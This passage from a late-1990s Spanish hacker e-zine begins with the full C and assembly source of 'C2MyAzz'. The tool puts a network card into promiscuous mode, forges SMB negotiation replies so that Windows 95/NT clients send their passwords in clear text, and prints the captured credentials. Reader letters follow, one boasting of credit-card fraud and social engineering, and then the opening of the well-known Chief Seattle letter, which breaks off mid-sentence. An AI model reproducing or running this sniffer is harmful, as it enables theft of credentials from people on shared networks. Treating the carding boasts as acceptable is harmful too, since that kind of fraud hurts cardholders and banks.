mov ax, BoardNum 
mov bx, 012h ; Get MLID Control Entry Pt 
call far ptr LSLProtocolSupportEntryPt 
mov word ptr [MLIDControlEntryPt], si 
mov word ptr [MLIDControlEntryPt +2], es 
pop ds 
pop es 
mov ComCode, ax 
} 

if (ComCode !=3d 0) 
{ 
printf ("C2MyAzz: cannot get MLID control entry pt rtn =3d %x. Is your 
MLID loaded? \n", ComCode); 
exit; 
} 

// Set the look ahead size of MLID to 128 bytes 
_asm 
{ 
push es 
push ds 
mov ax, BoardNum 
mov bx, 9 ;set look ahead size 
mov cx, 80h 
call far ptr MLIDControlEntryPt 
pop ds 
pop es 
mov ComCode, ax 
} 

if (ComCode !=3d 0) 
{ 
printf ("C2MyAzz: cannot set look ahead size to 128 rtn =3d %x \n", 
ComCode); 
exit; 
} 

printf ("C2MyAzz: Lookahead set to 128 bytes \n"); 

// Register the RX prescanner stack with LSL 
// init RX Node CB 

Rnode.boardnum =3d BoardNum; 
Rnode.position =3d LAST_MUST; 
Rnode.ISR =3d &RxISR; 
Rnode.StackID =3d 0xABCD; 
Rnode.ControlEntryPt =3d &CntrlEntryPt; 
Rnode.PacFilterMsk =3d 0xFFFF; 

_asm 
{ 
push es 
push ds 
mov ax,ds 
mov es,ax 
mov si, OFFSET Rnode 
mov bx, 01Ch ;register the RX prescanner 
call far ptr LSLProtocolSupportEntryPt 
pop ds 
pop es 
mov ComCode, ax 
} 

if (ComCode !=3d 0) 
{ 
printf("C2MyAzz: cannot register RX prescanner rtn =3d %x \n", ComCode); 
exit; 
} 

printf("C2MyAzz: Receive prescanner now registered \n"); 

// Enable promiscuous mode on the adapter so the we will receive all packets 

_asm 
{ 
push es 
push ds 
mov ax, BoardNum 
mov bx, 0ah ;set promiscuous mode 
mov cx, 1 ;all frames 
call far ptr MLIDControlEntryPt 
pop ds 
pop es 
mov ComCode, ax 
} 

if (ComCode !=3d 0) 
{ 
printf("C2MyAzz: cannot set board in promiscuous mode rtn =3d %x \n", 
ComCode); 
printf(" Does your board support promiscuous mode? \n"); 
exit; 
} 
printf ("C2MyAzz: Board now in promiscuous mode \n"); 

// Reset prescan stack to accept all frames 

i=3dRnode.StackID; // Cheat the assembler 
_asm 
{ 
push es 
push ds 
mov ax, BoardNum 
mov bx, 02bh ;modify stack filter 
mov cx, i 
mov dx, 0ffffh ;take everything 
call far ptr LSLProtocolSupportEntryPt 
pop ds 
pop es 
mov ComCode, ax 
} 

if (ComCode !=3d 0) 
{ 
printf("C2MyAzz: cannot set stack filter rtn =3d %x \n", ComCode); 
exit; 
} 
} 

//***************************************************************************** 
// Uninit - deregisters the prescan stack 
//***************************************************************************** 

void uninit(void) 
{ 
u16 ComCode; 

_asm 
{ 
push es 
push ds 
mov ax,ds 
mov es,ax 
mov si, OFFSET Rnode 
mov bx, 01Fh ;Deregister the RX prescanner 
call far ptr LSLProtocolSupportEntryPt 
pop ds 
pop es 
mov ComCode, ax 
} 

if (ComCode !=3d 0) 
{ 
printf("C2MyAzz: cannot deregister RX prescanner rtn =3d %x \n", 
ComCode); 
return; 
} 
} 

u8 stuffit(IPpac _far *pacptr, PID _far *pid, u8 _far *immAddr) 
{ 
//Check to see if this is an SMB within IP 
if (_fstrncmp((void far *)pacptr->x.SMB.IDString, (void far *) "SMB", 3) 
!=3d 0) 
return(0); 

//Is this packet a SMB Neg Request? 
if(pacptr->x.SMB.FunctionCode < 0x72) 
return(0); 

//Is this packet creating a server connection? 
if(pacptr->x.SMB.FunctionCode > 0x73) 
return(0); 

//Must be a packet of interest. 
return(1); 
} 

void _loadds _far grabit(void) 
{ 
//Grab what we need from the packet 
if (CurEntry < MAXENTRIES) // test for overflow 
{ 
pacptr=3d(IPpac _far *)RcvECB->Frag1Addr; 

Data[CurEntry].size=3d((pacptr->length >> 8) & 0x00FF) | 
((pacptr->length << 8)& 0xFF00); 
_fmemmove((void far *) Data[CurEntry].data, (void far *) pacptr, 
Data[CurEntry].size); 
_fmemmove((void far *) &Data[CurEntry].pid, (void far *) 
RcvECB->ProtocolID, sizeof(PID)); 
_fmemmove((void far *) Data[CurEntry].immAddr, (void far *) 
RcvECB->ImmAddr, 6); 
_fmemmove((void far *) &Data[CurEntry].type, (void far 
*)pacptr->x.SMB.FunctionCode, 2); 

_asm 
{ 
mov bx,1 ;Return ECB to LSL pool 
mov si, word ptr[RcvECB] 
mov es, word ptr[RcvECB+2] 
call far ptr LSLProtocolSupportEntryPt 
xor ax, ax ;clear AX and reset ZF 
} 

CurEntry++; // bump counter for next packet 
} 
} 

#pragma check_stack(on) 

//************************************************************* 
// Empty transmit complete ESR for LSL 
// 
//************************************************************* 

void _loadds _far TXCompleteESR() 
{ 
// Stack is ready for the next packet 
sendOK=3d0; 
} 

//************************************************************* 
// 
// Main processing of the packet occurs here. 
// Setup the forged ECB, then loop until a packet comes in 
// 
//************************************************************* 

main () 
{ 
IPpac *ECBData; 
u8 buffer[256]; 
ODIStat Rtn; 
u16 i; 
u16 ComCode; 
u16 j; 
ODIStat Stat; 
int ch; 
u32 SourceAddress; 
u32 DestAddress; 
u16 sourcePort; 
u16 destPort; 
u32 seqNum; 
u32 ackNum; 
u32 nextseqNum; 
u16 MuxID; 
u16 TreeID; 
u16 ProcID; 
u8 type; 
PID pid; 
char password[24]; 
char username[16]; 
u8 commandresp; 
u32 sum; 
u16 *ptr; 
u16 pktlen; 
u8 foundpw; 
u8 pwlen; 
u8 wstype; // 0 if 95, 1 if NT 

printf("C2MyAzz - Tricks Microsoft Networking clients to send their password 
as\n"); 
printf(" clear text. Displays a username/password combination. 
\n"); 
printf(" C2MyAzz requires LSL and a promiscuous mode LAN 
driver.\n\n"); 
printf(" Use at your own risk. Read Microsoft's CIFS 
documentation\n"); 
printf(" for more NT security holes. Copyright(c) 1997 \n\n\n"); 

// Setup for prescan 
init(); 
printf("C2MyAzz: All packets will now be received\n"); 
printf("C2MyAzz: Ready to scan for passwords\n"); 
printf("C2MyAzz: (press any key to exit)\n\n\n"); 

// Setup some of the static ECB information so that we don't waste cycles 
// when processing the packets 

XmitECB.Frag1Addr =3d buffer; 
ECBData =3d (IPpac *)buffer; 
XmitECB.DataLen =3d 105; 
XmitECB.ECBISR =3d TXCompleteESR; 
XmitECB.Frag1Len =3d 105; 
XmitECB.BoardNum =3d BoardNum; 
XmitECB.FragCnt =3d 1; 
XmitECB.NxtECB =3d (void far *) 0; 
XmitECB.PreECB =3d (void far *) 0; 

ECBData->version=3d0x45; 
ECBData->type=3d0x00; 
ECBData->length=3d0x6900; // Must byte-swap all words 
ECBData->identification=3d0xEEEE; // Should be ignored since no 
fragging 
ECBData->flags1=3d0x0040; 
ECBData->ttl=3d0x80; 
ECBData->protocol=3d0x06; 
ECBData->window=3d0x5221; 
ECBData->dataOffset=3d0x50; 
ECBData->flags2=3d0x18; 
ECBData->pad1=3d0x00; 
ECBData->nbtype=3d0x00; 
ECBData->nbflags=3d0x00; 
ECBData->nblength=3d0x4100; 

// Setup the ECB data for a raw send. We're building the SMB packet to 
spoof 
// client into sending their password clear text on the wire. Most of the 
// information was taken from an SMB client accessing our local SAMBA server 

ECBData->x.RAW.buf[0]=3d0xff; 
ECBData->x.RAW.buf[1]=3d0x53; 
ECBData->x.RAW.buf[2]=3d0x4d; 
ECBData->x.RAW.buf[3]=3d0x42; 
ECBData->x.RAW.buf[4]=3d0x72; 
ECBData->x.RAW.buf[5]=3d0x00; 
ECBData->x.RAW.buf[6]=3d0x00; 
ECBData->x.RAW.buf[7]=3d0x00; 
ECBData->x.RAW.buf[8]=3d0x00; 
ECBData->x.RAW.buf[9]=3d0x81; 
ECBData->x.RAW.buf[10]=3d0x00; 
ECBData->x.RAW.buf[11]=3d0x00; 
ECBData->x.RAW.buf[12]=3d0x00; 
ECBData->x.RAW.buf[13]=3d0x00; 
ECBData->x.RAW.buf[14]=3d0x00; 
ECBData->x.RAW.buf[15]=3d0x00; 
ECBData->x.RAW.buf[16]=3d0x00; 
ECBData->x.RAW.buf[17]=3d0x00; 
ECBData->x.RAW.buf[18]=3d0x00; 
ECBData->x.RAW.buf[19]=3d0x00; 
ECBData->x.RAW.buf[20]=3d0x00; 
ECBData->x.RAW.buf[21]=3d0x00; 
ECBData->x.RAW.buf[22]=3d0x00; 
ECBData->x.RAW.buf[23]=3d0x00; 

// We need the Tree ID, Process ID, and Mux ID from the look ahead buffer 
// since these fields change on every connection 
//ECBData->x.RAW.buf[24]=3d0x00; Tree ID 
//ECBData->x.RAW.buf[25]=3d0x00; 
//ECBData->x.RAW.buf[26]=3d0xbf; Process ID 
//ECBData->x.RAW.buf[27]=3d0x1b; 

ECBData->x.RAW.buf[28]=3d0x00; 
ECBData->x.RAW.buf[29]=3d0x00; 

//ECBData->x.RAW.buf[30]=3d0x81; Mux ID 
//ECBData->x.RAW.buf[31]=3d0x40; 

ECBData->x.RAW.buf[32]=3d0x0D; 
ECBData->x.RAW.buf[33]=3d0x02; // Dialect 2 for 95 ws, Dialect 5 for NT 
ECBData->x.RAW.buf[34]=3d0x00; 
ECBData->x.RAW.buf[35]=3d0x01; 
ECBData->x.RAW.buf[36]=3d0x00; 
ECBData->x.RAW.buf[37]=3d0x04; 
ECBData->x.RAW.buf[38]=3d0x11; 
ECBData->x.RAW.buf[39]=3d0x02; 
ECBData->x.RAW.buf[40]=3d0x00; 
ECBData->x.RAW.buf[41]=3d0x01; 
ECBData->x.RAW.buf[42]=3d0x00; 
ECBData->x.RAW.buf[43]=3d0x03; 
ECBData->x.RAW.buf[44]=3d0x00; 
ECBData->x.RAW.buf[45]=3d0xB0; 
ECBData->x.RAW.buf[46]=3d0x8B; 
ECBData->x.RAW.buf[47]=3d0xA1; 
ECBData->x.RAW.buf[48]=3d0x00; 
ECBData->x.RAW.buf[49]=3d0x2B; 
ECBData->x.RAW.buf[50]=3d0x52; 
ECBData->x.RAW.buf[51]=3d0x5C; 
ECBData->x.RAW.buf[52]=3d0x22; 
ECBData->x.RAW.buf[53]=3d0xA4; 
ECBData->x.RAW.buf[54]=3d0x01; 
ECBData->x.RAW.buf[55]=3d0x00; 
ECBData->x.RAW.buf[56]=3d0x00; 
ECBData->x.RAW.buf[57]=3d0x00; 
ECBData->x.RAW.buf[58]=3d0x00; 
ECBData->x.RAW.buf[59]=3d0x00; 
ECBData->x.RAW.buf[60]=3d0x00; 
ECBData->x.RAW.buf[61]=3d0x00; 
ECBData->x.RAW.buf[62]=3d0x00; 
ECBData->x.RAW.buf[63]=3d0x00; 
ECBData->x.RAW.buf[64]=3d0x00; 
ECBData->x.RAW.buf[65]=3d0x00; 
ECBData->x.RAW.buf[66]=3d0x00; 
ECBData->x.RAW.buf[67]=3d0x00; 
ECBData->x.RAW.buf[68]=3d0x00; 
ECBData->x.RAW.buf[69]=3d0x00; 
ECBData->x.RAW.buf[70]=3d0x00; 
ECBData->x.RAW.buf[71]=3d0x00; 
ECBData->x.RAW.buf[72]=3d0x00; 
ECBData->x.RAW.buf[73]=3d0x00; 
ECBData->x.RAW.buf[74]=3d0x00; 
ECBData->x.RAW.buf[75]=3d0x00; 
ECBData->x.RAW.buf[76]=3d0x00; 
ECBData->x.RAW.buf[77]=3d0x00; 
ECBData->x.RAW.buf[78]=3d0x00; 
ECBData->x.RAW.buf[79]=3d0x00; 
ECBData->x.RAW.buf[80]=3d0x00; 
ECBData->x.RAW.buf[81]=3d0x00; 
ECBData->x.RAW.buf[82]=3d0x00; 
ECBData->x.RAW.buf[83]=3d0x00; 
ECBData->x.RAW.buf[84]=3d0x00; 
ECBData->x.RAW.buf[85]=3d0x00; 
ECBData->x.RAW.buf[86]=3d0x00; 
ECBData->x.RAW.buf[87]=3d0x00; 
ECBData->x.RAW.buf[88]=3d0x00; 
ECBData->x.RAW.buf[89]=3d0x00; 
ECBData->x.RAW.buf[90]=3d0x00; 
ECBData->x.RAW.buf[91]=3d0x00; 
ECBData->x.RAW.buf[92]=3d0x00; 
ECBData->x.RAW.buf[93]=3d0x00; 
ECBData->x.RAW.buf[94]=3d0x00; 
ECBData->x.RAW.buf[95]=3d0x00; 
ECBData->x.RAW.buf[96]=3d0x00; 
ECBData->x.RAW.buf[97]=3d0x00; 
ECBData->x.RAW.buf[98]=3d0x00; 
ECBData->x.RAW.buf[99]=3d0x00; 
ECBData->x.RAW.buf[100]=3d0x00; 
ECBData->x.RAW.buf[101]=3d0x00; 
ECBData->x.RAW.buf[102]=3d0x00; //last byte 
ECBData->x.RAW.buf[103]=3d0x01; 

// Setup some of the variables that we'll use later 
foundpw=3d0; 
sendOK=3d0; 
wstype=3d0; 

do 
{ 
do 
{ 
// Loop until someone hits a key or until we have a packet to 
process 
if(kbhit()) 
{ 
printf("C2MyAzz: Exiting\n"); 
uninit(); 
exit(0); 
} 
} while (CurEntry =3d=3d 0); //Loop until we get a packet 

// Grab data out of packet to determine whether or not to proceed 
type =3d (u8) (((IPpac *)(Data[0].data))->x.SMB.FunctionCode); 
commandresp =3d (u8) (((IPpac *)(Data[0].data))->x.USERPWNT.cmdresp); 

// NT and 95 use different username / password combinations. Check 
// to see if the client is a 95 or NT workstation. Note that we're checking 
// to see if the workstation supports long filenames (0x3 =3d NT), or DOS 
// 8.3 only (0x0 =3d 95). This is an assumption based on observation. We 
// could use additional information in the packet to determine NT or 95.. 

if((((IPpac *)(Data[0].data))->x.SMB.Flags2) =3d=3d 0x3) 
wstype=3d1; // Looks like an NT Workstation 
else 
wstype=3d0; // Otherwise, a Windows 95 machine 

// If this is a SMB NEG PROT and this is a request, grab information 
// for the transmit ECB 
if((type =3d=3d 0x72) && (!(commandresp & 0x80))) 
{ 
SourceAddress=3d(u32)(((IPpac *)(Data[0].data))->srcaddr); 
DestAddress=3d(u32)(((IPpac *)(Data[0].data))->destaddr); 
sourcePort=3d(u16)(((IPpac *)(Data[0].data))->srcport); 
destPort=3d(u16)(((IPpac *)(Data[0].data))->destport); 
seqNum=3d(u32)(((IPpac *)(Data[0].data))->seqnumber); 
ackNum=3d(u32)(((IPpac *)(Data[0].data))->acknumber); 
MuxID =3d (u16) (((IPpac *)(Data[0].data))->x.SMB.muxId); 
TreeID =3d (u16) (((IPpac *)(Data[0].data))->x.SMB.TreeID); 
ProcID =3d (u16) (((IPpac *)(Data[0].data))->x.SMB.ProcessID); 
pktlen =3d (u16) (((IPpac *)(Data[0].data))->length); 
memmove(&pid, &Data[0].pid, sizeof(PID)); 
memmove(&immAddr, &Data[0].immAddr, sizeof(immAddr)); 
memmove(XmitECB.ImmAddr, (void *) immAddr, 6); 
memmove(&XmitECB.ProtocolID, &pid, sizeof(PID)); 
*((u32 *)(&(ECBData->destaddr)))=3dSourceAddress; 
*((u32 *)(&(ECBData->srcaddr)))=3dDestAddress; 
*((u16 *)(&(ECBData->destport)))=3dsourcePort; 
*((u16 *)(&(ECBData->srcport)))=3ddestPort; 
*((u32 *)(&(ECBData->seqnumber)))=3dackNum; 
*((u16 *)(&(ECBData->x.RAW.buf[24])))=3dTreeID; 
*((u16 *)(&(ECBData->x.RAW.buf[26])))=3dProcID; 
*((u16 *)(&(ECBData->x.RAW.buf[30])))=3dMuxID; 

if(wstype =3d=3d 1) 
ECBData->x.RAW.buf[33]=3d0x05; //NT Workstation uses dialect 5 
else 
ECBData->x.RAW.buf[33]=3d0x02; //95 Workstation uses dialect 2 

// Need to calculate the IP and TCP headers. Start by setting up for 
// grabbing the sequence numbers of the previous packets, and ca 
seqNum=3dflipbyte32(seqNum); 
pktlen=3dflipbyte16(pktlen); 

// Ack number is last packet + data - header 
nextseqNum=3d(seqNum + pktlen - 40); 
nextseqNum=3dflipbyte32(nextseqNum); 
*((u32 *)(&(ECBData->acknumber)))=3dnextseqNum; 
seqNum=3dflipbyte32(seqNum); 
pktlen=3dflipbyte16(pktlen); 

// Calculate the IP and TCP checksums 
// Initially set the CRCs to zero 
ECBData->headerCRC=3d0x0000; 
ECBData->tcpCRC=3d0x0000; 
sum=3d0; 

// Start by adding up all the bytes in IP header 
ptr=3d(u16 *)ECBData; 
for(j=3d0;j<10;j++) 
sum+=3d(ptr[j]); 

// Add any overflow into the sum 
sum=3d(sum>>16)+(sum & 0xffff); 
sum+=3d(sum>>16); 
// Take 1's complement 
ECBData->headerCRC=3d~sum; 

// Calculate the TCP Checksum 
// Note that we need to first create a pseudo-header for 
// use in the TCP checksum. For more information, see page 
// 186 of "Internetworking with TCP/IP" by Comer 
sum=3d0; // Clear sum from last calculation 
sum+=3dptr[6]; // Add up the IP address 
sum+=3dptr[7]; 
sum+=3dptr[8]; 
sum+=3dptr[9]; 
sum+=3d0x0600; // Add in the protocol ID for TCP in IP 
sum+=3d0x5400; // Add in the length of TCP data 
for(j=3d10;j<74;j++) // Add up the bytes in the ECB 
sum+=3d(ptr[j]); 

// Add any overflow into the sum 
sum=3d(sum>>16)+(sum & 0xffff); 
sum+=3d(sum>>16); 

// Take 1's complement 
ECBData->tcpCRC=3d~sum; 


if((foundpw =3d=3d 0) && (sendOK =3d=3d 0)) 
{ 
// SendOK is reset after the packet is sent 
sendOK=3d1; 
// Pass the ECB to LSL for a raw send 
_asm 
{ 
push es 
push ds 
mov ax, SEG XmitECB 
mov es, ax ;Whew! Lots of work just to get 
mov si, OFFSET XmitECB ;a packet on the wire. 
mov bx, 0ch ;Let's transmit this tiresome 
hag 
call far ptr LSLProtocolSupportEntryPt 
mov ComCode, ax 
pop ds 
pop es 
} 
} 
else 
foundpw=3d0; 
} // End of packet send routine 

// If we've received the client's password, display it on the screen 
if(type =3d=3d 0x73) 
{ 
memmove(password, ((IPpac*)(Data[0].data))->x.USERPWNT.password, 32); 
memmove(username, ((IPpac*)(Data[0].data))->x.USERPW95.username, 15); 
pwlen =3d (u8) (((IPpac *)(Data[0].data))->x.USERPWNT.pwlength); 

// Since the password could be null, check to see if it appears 
// to be a valid password. Is the first character of the password 
// a valid ASCII character? 
if((password[0] >=3d 0x21) && (password[0] <=3d 0x5D)) 
{ 
// If we spoof every packet, we won't connect to IPC to find the 
// shares of the domain. By spoofing every other packet, we'll let 
// the connection go through after a retry. This approach will 
// present the user with an error screen after attempting to connect 
// to the doamin, but if the user retries, we'll backoff and let 
// the user through 
foundpw=3d1; 
if(wstype =3d=3d 1) 
printf("User %s password is %s\n",&password[strlen(password)+1], 
password); 
else 
{ 
// Need to null terminate the strings 
password[23]=3d0x00; 
username[15]=3d0x00; 
printf("User %s password is %s\n", username, password); 
} 
} 
} // End of password display routine 

// Now that we've processed the packet, clear the buffer of the processed 
// packet. Note that we're disabling interrupts because we might 
// get stomped with a new packet while we're clearing out the old packet 

_disable(); 
memmove(Data, &Data[1],(sizeof(Data) - sizeof(IPInfo))); 
CurEntry--; 
_enable(); 

} while (1); 
} 

------------ FIN -------------------------------------------------------------

        Ahora te pongo el .h 

------------ Codigo Fuente ---------------------------------------------------

// 
// 
// 

#define flipbyte32( x ) ((u32) \ 
((((u32)(x) & 0x000000FFL) << 24) | \ 
(((u32)(x) & 0x0000FF00L) << 8) | \ 
(((u32)(x) & 0x00FF0000L) >> 8) | \ 
(((u32)(x) & 0xFF000000L) >> 24))) 

#define flipbyte16( x ) ((u16) \ 
((((u16)(x) & 0x00FF) << 8) | \ 
(((u16)(x) & 0xFF00) >> 8))) 

typedef signed char s8; 
typedef unsigned char u8; 
typedef unsigned int u16; 
typedef long unsigned int u32; 

typedef struct 
{ u32 lo; 
u32 hi; 
} u64; 

typedef struct 
{ u8 addr [8]; 
} Addr; 

typedef struct 
{ u8 ID[6]; 
} PID; 

typedef u32 ProtocolNumber; 

typedef enum 
{ ODI_SUCCESS =3d 0, 
ODI_OUT_OF_RESOURCES =3d -119, 
ODI_NO_MORE_ITEMS =3d -122, 
ODI_FAIL =3d -124 
} ODIStat; 

typedef enum 
{ FIRST_MUST, 
FIRST_NEXT, 
LOAD_DEPENDS, 
LAST_NEXT, 
LAST_MUST, 
} CHNPOS; 

typedef struct 
{ 
u8 version; 
u8 type; 
u16 length; 
u16 identification; 
u16 flags1; 
u8 ttl; 
u8 protocol; 
u16 headerCRC; 
u32 srcaddr; 
u32 destaddr; 

//Start TCP Header 

u16 srcport; 
u16 destport; 
u32 seqnumber; 
u32 acknumber; 
u8 dataOffset; 
u8 flags2; 
u16 window; 
u16 tcpCRC; 
u16 pad1; 

//Start NB Header 

u8 nbtype; 
u8 nbflags; 
u16 nblength; 

union 
{ 
struct 
{ 
u8 Reserved0; 
u8 IDString[3]; 
u8 FunctionCode; 
u8 Reserved1[4]; 
u8 Flags1; 
u16 Flags2; 
u8 Reserved2[12]; 
u16 TreeID; 
u16 ProcessID; 
u16 Reserved3; 
u16 muxId; 
} SMB; 
struct 
{ 
u8 buf[32]; 
} RAW; 
struct 
{ 
u8 reserved1[9]; 
u8 cmdresp; 
u8 reserved[43]; 
u8 pwlength; 
u8 reserved2; 
u8 password[32]; 
}USERPWNT; 
struct 
{ 
u8 reserved1[9]; 
u8 cmdresp; 
u8 reserved[43]; 
u8 pwlength; 
u8 reserved2; 
u8 password[24]; 
u8 username[16]; 
}USERPW95; 
} x; 

} IPpac; 

// template for Info Block 

typedef u32 Func; 

typedef struct 
{ 
void (_far * LSLAPI )(); 
void (_far * GSAPI )(); 
void (_far * MLIDAPI)(); 
} InfoBlock; 

// template for info copied from IP packet 

typedef struct 
{ 
u8 immAddr[6]; 
u8 type; 
u16 size; 
PID pid; 
char data[1500]; 
} IPInfo; 

typedef struct ECBs 
{ 
void _far * NxtECB; 
void _far * PreECB; 
u16 Status; 
void (_far * ECBISR)(); 
u16 ProtocolNum; 
u8 ProtocolID[6]; 
u16 BoardNum; 
u8 ImmAddr[6]; 
u8 ECBDrvrWkSpace[4]; 
u16 ECBPrtclWkSpace[4]; 
u16 DataLen; 
u16 FragCnt; 
u8 _far * Frag1Addr; 
u16 Frag1Len; 
} EventCB; 

typedef struct 
{ 
u8 _far * MediaHdr; // 4 
u8 _far * DataPtr; // 4 
u16 DataLen; // 2 
PID ProtocolID; // 6 
u16 BoardNum; // 2 
u16 DataSize; // 2 
PID ImmAddr; // 6 
u16 PacAttrib; // 2 
u16 DestType; // 2 
u16 StartOffset; // 2 
u8 PriorityLvl; // 1 
u8 Reserved; // 1 
} LookAhead; 

typedef struct RxChainNode 
{ 
u32 nextlink; // 4 
u16 boardnum; // 2 
u16 position; // 2 
void (_far _loadds * ISR)(); // 4 
void (_far * ControlEntryPt)(); // 4 
u16 StackID; // 2 
u16 PacFilterMsk; // 2 
u32 Reserved; // 4 
} RxNode; // 24 total 

typedef struct 
{ 
u8 cmajver; 
u8 cminver; 
u32 longname; 
u32 shortname; 
u8 pmajver; 
u8 pminver; 
u8 reserved[16]; 
} configtbl; 

typedef struct 
{ 
u8 majver; 
u8 minver; 
u16 ctr; 
u32 mask; 
u32 txpac; 
u32 rxpac; 
u32 nopac; 
u16 cusctr; 
} stattbl; 

------------ FIN -------------------------------------------------------------

  Bueno os dejo, por hoy, si por alguna casualidad un dia me apetece, 
  mandare otro texto del nbtstat, explicandolo que protocolos hay que 
  tener instalados, etc. 

  ad10. 

  P.D. Por problemas tecnicos hemos tenido que quitar la pagina, por lo 
  cual estamos buscando nuevo server, aunque seguro que cogamos un dominio 
  propio. Ya que para septiembre cambianos totalmente la pagina. 


  {CyBoRg} -thPrOpHeT- 
  SHG Security Group 

  <------>

  [ Lastima lo del web y esperamos oir de vosotros pronto y a ver si te
    animas y nos escribes algo ;-) ]

<>
 
  From:  "Angel" <r9r99@xxxxxxxxxxxxxx>      
  Subject:  Hola  
 
  Estoy realizando un proyecto sobre virus que explicara 
  como funcionan, con todo detalle en todas las plataformas 
  existentes, 
  os agradeceria cualquier tipo de informacion al respecto (en 
  espaol), si teneis algo, sea lo que sea, por favor mandarmelo a: 

  r9r99@xxxxxxxxxxxxxx 

  Muchas gracias. En cuanto lo tenga terminado os lo enviare 
  por si quereis publicarlo. 

  <------>

  [ Pasate por nuestra seccion de VIRUS, que te sera muy util, y ya sabes
    estamos esperando tu articulo de virus. ]

<>

  From:  Usuari Escombra <ko@xxxxxxxxxxxxxx>
  To:  jjf_team@usa.net  
  Subject:  quiero colaborar  
 
  Holas... me encanta vuestro e-zine... especialmete el 3 y el 4... 
  porque el 1 es... como lo diriamos... un poco verde... pero de buen 
  rollo..! 
  Os escribo desde Barcelona.. (Spain) jajaja... pq aqui el tema esta muy 
  candente... mi seudonimo es NoFace aunque este es nuevo ya que antes yo 
  me hacia llamr NEXUS... sip uno de tantos pero quizas uno de los 
  primeros... Tengo alguna experiencia en hackear sistemas Unix... 
  y soy especialista en MACINTOSH... en eso no hay quien me gane aunque no 
  pude superar el reto de Apple para hackear su pagina... me preguntaba si 
  podria formar parte en la revista... Ah.. domino bastante de Carding 
  algo me he sacado con las Visas y poseo el secreto de generar numeros 
  con PELAS a partir de algun numero ya caducado.. me lo ensenyo un 
  coleguilla que controla mucho... Me ofrezco a redactar todo tipo de 
  articulos... de tema que sea escepto de Telefonia que poseo un 
  conocmiento limitado... 
  Opino que el Hack es uan forma de vida y como no una forma de pensar... 
  Gracias y espero que me escribais. Diciendome si colaboro o no..? OK 
  Venga animo y seguid asi que soys cojonudos e id con cuidado... EL GRAN 
  HERMANO OS OBSERVA jejeje.. bueno os escribo desde la universidad POMPEU 
  FABRA.. jeje infiltrado... jejej.... A ver si no me pillan un dia de 
  estos... una vez me pillaron Intentando hackaer el server central... y 
  me quede con el admin... jeje INGENIERIA SOCIAL... 
  - no, mi crnet.. mmmm me lo he dejado en casa... 
  _ no puedes estar aqui sin carnet... por cierto que haces.. ?? 
  _ Nada... nada... 
  _ Fuera.. 
  _ y tu quien eres...?? 
  _ el admin.. 
  (cara de superioridad) 
  _ A si? pues ensenyame el carnet ... (jejeje) 
  _ ahora voy a buscarlo... pa chulo yo... 
  (NoFace desaparece.. jejeje) anda buscame 

  Bueno SALUDOS....... HACK THE WORLD IS FUCK THE WORLD 

  XnexusX@xxxxxxxxxxxxxx <---- Ismael del servidor.. jejeervidor.. jeje 

  <------>

  [ Pues los mienbros de la revista son los componentes de - J.J.F. / HACKERS
    TEAM - y es un grupo cerrado. Pero por supuesto puedes escribir lo que
    quieras que nosotros te lo ponemos encantados :) ]

<>

  From:  Manuel-el oso <sambam@xxxxxxxxxxxxxx>
  To:  sambam@xxxxxxxxxxxxxx  
  Subject:  el indio piel roja....  

  La historia nos recuerda que en cierta ocasion el 
  presidente de los Estados Unidos intento comprar 
  el territorio ocupado por los indios. Para ello le hizo 
  una proposicion al jefe indio "toro sentado". 
  Y esta fue su respuesta: 

  *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ 

  CARTA DEL JEFE INDIO 

        Como se puede comprar o vender el firmamento, ni aun el calor de la
  tierra?. Dicha idea nos es desconocida. Si no somos dueos de la frescura
  del aire ni del fulgor de las aguas Como podrian ustedes comprarlos? Cada
  parcela de esta tierra es sagrada para mi pueblo. Cada brillante mata de
  pino, cada grano de arena de las playas, cada gota de rocio en los oscuros
  bosques, cada altozano y hasta el sonido de cada insecto es sagrado a la
  memoria y al pasado de mi pueblo. La savia que circula por las venas de los
  robles lleva consigo las memorias de los pieles rojas.
        Los muertos del hombre blanco olvidan su pais de origen cuando
  emprenden sus paseos por las estrellas; en cambio, nuestros muertos nunca
  pueden olvidar esa bondadosa tierra, puesto que es la madre de los pieles
  rojas. Somos parte de la tierra y asi mismo, ella es parte de nosotros. Las
  flores perfumadas son nuestras hermanas; el venado, el caballo, la gran
  guila; estos son nuestros hermanos. Las escarpadas peas, los humedos
  prados, el calor del cuerpo del caballo y el hombre, todos pertenecemos a
  la misma familia. 

        Por todo ello cuando el Gran Jefe de Washington nos envia el mensaje 
  de que quiere comprar nuestras tierras dice que nos reservar un lugar en el 
  que podamos vivir confortablemente entre nosotros. El se convertir en
  nuestro padre y nosotros en sus hijos. Por ello consideramos su oferta de
  comprar nuestras tierras. Ello no es facil, ya que esta tierra es sagrada
  para nosotros. 
        El agua cristalina que corre por los rios y arroyuelos no es
  solamente agua, sino, tambien, representa la sangre de nuestros antepasados.
  Si le vendemos nuestra tierra deben recordar que es sagrada y a la vez
  deben ensear a sus hijos que es sagrada y cada reflejo fantasmagorico en
  las claras aguas de los lagos cuenta los sucesos y memorias de las vidas
  de nuestras gentes. El murmullo del agua es la voz del padre de mi padre. 
        Los rios son nuestros hermanos y sacian nuestra sed; son portadores de 
  nuestras canoas y alimentan a nuestros hijos. Si les vendemos nuestras
  tierras, ustedes deben recordar y ensearles a sus hijos que los rios son
  nuestros hermanos y tambien lo son suyos y, por lo tanto, deben tratarlos
  con la misma dulzura con la que se trata a un hermano. Sabemos que el
  hombre blanco no comprende nuestro modo de vida. El no sabe distinguir
  entre un pedazo de tierra y otro, ya que es un extrao que llega de noche y
  toma de la tierra lo que necesita.
        La tierra no es su hermana, sino su enemiga, y una vez conquistada
  sigue su camino, dejando atras la tumba de sus padres sin importarle. Le
  secuestra la tierra a sus hijos. Tampoco le importa, tanto la tumba de sus
  padres como el patrimonio de sus hijos son olvidados. Trata a su madre, la
  tierra, y a su hermano, el firmamento, como objetos que se compran, se
  explotan y se venden como ovejas o piedras de colores. Su apetito devorar
  la tierra, dejando atras solo un desierto. 
        No se, pero nuestro modo de vida es diferente al de ustedes. La sola 
  visita de sus ciudades apenan los ojos del piel roja. Pero quiza sea por 
  que el piel roja es un salvaje y no comprende nada. 
        No existe un lugar tranquilo en las ciudades del hombre blanco, ni
  hay sitio donde escuchar como se abren las hojas de los arboles en primavera
  o como aletean los insectos. Pero quiza tambien esto debe ser porque soy 
  un salvaje que no comprende nada. El ruido solo parece insultar nuestros 
  oidos. Y despues de todo, para que sirve la vida si el hombre no puede 
